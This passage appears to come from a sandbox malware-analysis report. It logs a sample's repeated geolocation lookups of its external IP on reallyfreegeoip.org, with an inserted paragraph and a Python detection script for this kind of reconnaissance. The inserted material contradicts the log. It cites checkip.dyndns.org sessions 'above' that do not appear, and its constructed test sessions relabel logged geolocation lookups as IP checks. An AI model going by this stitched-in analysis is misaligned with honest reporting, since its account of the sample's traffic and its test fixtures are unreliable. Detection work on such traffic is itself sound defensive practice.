2024-11-07 14:19:31 UTC | 205 | IN | Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

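The six checkip.dyndns.org sessions above (a hard-coded MSIE 6.0 User-Agent sent from the sample's own process, a 502 followed by a fresh connection roughly every 2.5 seconds) and the reallyfreegeoip.org lookup of the very IP that check returned are the sample's external-IP and geolocation reconnaissance. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses HTTP exchanges reconstructed from the sessions on this page and correlates them into three findings (legacy User-Agent, IP-check retry loop, IP-to-geolocation chain). The session record layout, the rule names, and the benign browser session with sid 99 are assumptions made for the example.

```python
"""Detection logic for the external-IP / geolocation recon sequence in this report.
Added example, not code from the Joe Sandbox report or from the sample. HTTP messages
are reconstructed from the sessions on this page (constructed, abbreviated headers);
the session record layout is an assumption, not Joe Sandbox's export format."""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Indicators copied from the sessions on this page.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

def parse_http(raw):
    """Split one HTTP message into start line, lower-cased header map and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}

def ip_from_checkip_body(body):
    """checkip.dyndns.org answers '<body>Current IP Address: a.b.c.d</body>'."""
    m = re.search(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})", body)
    return m.group(1) if m else None

def parse_geoip_xml(body):
    """reallyfreegeoip.org/xml/<ip> returns a flat <Response> of tag/value pairs."""
    return {c.tag: (c.text or "").strip() for c in ET.fromstring(body.strip())}

def analyze(sessions, retry_window=timedelta(seconds=30), retry_threshold=3):
    """Correlate one host's IP-check and geolocation sessions (keys: sid, pid, proc,
    ts, request, response). Returns the learned external IP, the parsed geo record
    and the fired rules as (rule_id, sid, detail) tuples."""
    parsed = []
    for s in sorted(sessions, key=lambda x: x["ts"]):
        req, resp = parse_http(s["request"]), parse_http(s["response"])
        words = resp["start"].split()
        parsed.append((s, req, resp, req["headers"].get("host", "").lower(),
                       words[1] if len(words) > 1 else ""))
    result = {"external_ip": None, "geo": None, "rules": []}
    # Pass 1: the external IP the sample learned. Done first because in the report
    # the geolocation lookup precedes the IP-check sessions shown on this page.
    for s, req, resp, host, status in parsed:
        if host in IP_CHECK_HOSTS and status == "200":
            result["external_ip"] = ip_from_checkip_body(resp["body"]) or result["external_ip"]
    # Pass 2: per-session rules.
    checkip_ts = defaultdict(list)
    for s, req, resp, host, status in parsed:
        if host in IP_CHECK_HOSTS:
            checkip_ts[s["pid"]].append(s["ts"])
            if req["headers"].get("user-agent") == LEGACY_UA:
                result["rules"].append(("legacy-ua", s["sid"], f"{s['proc']} sent IE6 UA to {host}"))
        elif host in GEOIP_HOSTS:
            m = IPV4.search(req["start"])
            if m and m.group(1) == result["external_ip"]:
                result["rules"].append(("ip-geo-chain", s["sid"], f"geolocates learned IP {m.group(1)}"))
            if status == "200" and resp["headers"].get("content-type", "").startswith("text/xml"):
                result["geo"] = parse_geoip_xml(resp["body"])
    # Pass 3: retry loop, i.e. many IP checks from one process in a short window
    # (the report shows a new session roughly every 2.5 s after the 502).
    for pid, stamps in checkip_ts.items():
        for start in sorted(stamps):
            n = sum(1 for t in stamps if timedelta(0) <= t - start <= retry_window)
            if n >= retry_threshold:
                result["rules"].append(("ipcheck-retry", None, f"pid {pid}: {n} checks in {retry_window}"))
                break
    return result

def _msg(start, headers, body=""):
    return start + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers) + "\r\n" + body

def _t(hms):  # timestamps as in the report, UTC
    return datetime(2024, 11, 7, *map(int, hms.split(":")), tzinfo=timezone.utc)

PROC = r"C:\Users\user\Desktop\Lpjrd6Wxad.exe"
CHECKIP_REQ = _msg("GET / HTTP/1.1", [("User-Agent", LEGACY_UA), ("Host", "checkip.dyndns.org")])
CHECKIP_502 = _msg("HTTP/1.1 502 Bad Gateway", [("Content-Type", "text/html")],
                   "<html><head><title>502 Bad Gateway</title></head><body></body></html>")
CHECKIP_200 = _msg("HTTP/1.1 200 OK", [("Content-Type", "text/html")],
                   "<html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>\r\n")
GEO_REQ = _msg("GET /xml/173.254.250.79 HTTP/1.1", [("Host", "reallyfreegeoip.org")])
GEO_200 = _msg("HTTP/1.1 200 OK", [("Content-Type", "text/xml")],
               "<Response>\n\t<IP>173.254.250.79</IP>\n\t<CountryCode>US</CountryCode>\n\t<CountryName>United States"
               "</CountryName>\n\t<RegionCode>TX</RegionCode>\n\t<RegionName>Texas</RegionName>\n\t<City>Killeen</City>\n"
               "\t<TimeZone>America/Chicago</TimeZone>\n\t<Latitude>31.0065</Latitude>\n\t<Longitude>-97.8406</Longitude>\n</Response>\n")
# Constructed sessions: sid/pid/timestamps follow the report; sid 99 is a hypothetical
# single browser lookup with a modern UA, included to show that it fires no rule.
SAMPLE_SESSIONS = [
    dict(sid=0, pid=3648, proc=PROC, ts=_t("14:19:31"), request=GEO_REQ, response=GEO_200),
    dict(sid=2, pid=3648, proc=PROC, ts=_t("14:19:36"), request=CHECKIP_REQ, response=CHECKIP_502),
    dict(sid=3, pid=3648, proc=PROC, ts=_t("14:19:39"), request=CHECKIP_REQ, response=CHECKIP_200),
    dict(sid=4, pid=3648, proc=PROC, ts=_t("14:19:41"), request=CHECKIP_REQ, response=CHECKIP_200),
    dict(sid=99, pid=1234, proc=r"C:\Program Files\Browser\browser.exe", ts=_t("14:25:00"),
         request=_msg("GET / HTTP/1.1", [("User-Agent", "Mozilla/5.0"), ("Host", "checkip.dyndns.org")]),
         response=CHECKIP_200),
]
```

Calling analyze(SAMPLE_SESSIONS) yields the external IP 173.254.250.79, the geolocation record (CountryCode US, City Killeen) and the three rules; the single browser lookup in sid 99 produces nothing, which is the point of keying the retry count by PID and of matching the exact legacy User-Agent rather than the destination host alone. In a real deployment the same three rules map naturally onto proxy or Zeek http.log fields (uid, id.orig_p, host, user_agent, uri).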

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:33 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-07 14:19:33 UTC | 1217 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:33 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32351
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkSyiZeEztHwopDBFQ%2BPyL6z3Dy6yNtoQv0rJOZXdS2xip7SzAhNqcOcKb57%2FoZrCPv5DXoqez2aN8zW19T6BECK8g0tSBATIopfTr3nopq8jQGlDymy%2FFqLVRxFmunBUxDR0rse"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf57ecbbf144c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1496&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2367947&cwnd=247&unsent_bytes=0&cid=e6aa85e4fa4d4cb8&ts=159&x=0"
2024-11-07 14:19:33 UTC | 152 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-07 14:19:33 UTC | 207 | IN | Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:36 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-07 14:19:36 UTC | 1221 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:36 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32354
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGEBUI1QDRcqBGzleCLZqqqODw6J38rYXwGEi1grAQTYhQYPL8LmMfmkUD3ojzPOTBdr%2FOyDz%2BhmP6u2y%2BxIH3a3klVZxGmCxSWNDuNpEPaUCRW%2F1xvNtcD1CDe501ckG10G9%2Fy3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf590ca3aa912-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1691588&cwnd=159&unsent_bytes=0&cid=5dbf16d5112fa503&ts=157&x=0"
2024-11-07 14:19:36 UTC | 148 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-07 14:19:36 UTC | 211 | IN | Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49713 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:41 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-07 14:19:41 UTC | 1227 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:41 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32359
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pIehSivwplrjZeW%2B3kas7myW%2FBjIlZnYInOMbDRj6LGlSfRzu4%2B%2FJrZSMsbVcbYo%2Fx8QfJ4%2FyJY6PxHJmvjETtWV6xsR8vauAMxPM8Xl4HhjU81s4qgs%2BxERKQ9p%2FTtHtO5fFwC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf5b2b893e7bf-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1607103&cwnd=251&unsent_bytes=0&cid=f9016722dd1224ea&ts=148&x=0"
2024-11-07 14:19:41 UTC | 142 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
2024-11-07 14:19:41 UTC | 217 | IN | Data Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:43 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-07 14:19:43 UTC | 1219 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:43 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32361
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZF9hn5CmWv7Zr410R4McFl3ns1irVUXnN4VIT%2F%2FTSsvVoexA5yAfPGfKEQrlJFa1zIDbowdbGROT%2Bde56OqaShP20sySVWIKodrr5ePB5bgQkoyjjedKDglw0zj7K%2F18RF2YhqEL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf5bd1875e94e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1992&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1430830&cwnd=251&unsent_bytes=0&cid=0f9c121cd21a6556&ts=226&x=0"
2024-11-07 14:19:43 UTC | 150 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-07 14:19:43 UTC | 209 | IN | Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49722 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:45 UTC | 63 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-07 14:19:46 UTC | 1219 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:46 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32364
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNkXzpNekCDQFw2I2PaP8x1%2FebSkimn9sqAAZkHuCx%2FlrkYqJsniJm2FqXvTODKNZd3lh%2BnHT95rwmPiyB%2BiR2mMpP5Q5Ru8UMBVhsu4GeH72viRjbO6tfNubQq3VKCvThiezDtd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf5cc9f7e6c37-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2362153&cwnd=230&unsent_bytes=0&cid=98c68ef282b4430e&ts=190&x=0"
2024-11-07 14:19:46 UTC | 150 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-07 14:19:46 UTC | 209 | IN | Data Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID: 6 | Source: 192.168.2.8:49724 | Destination: 188.114.96.3:443 | PID: 3648 | Process: C:\Users\user\Desktop\Lpjrd6Wxad.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:48 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-07 14:19:48 UTC | 1223 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:48 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
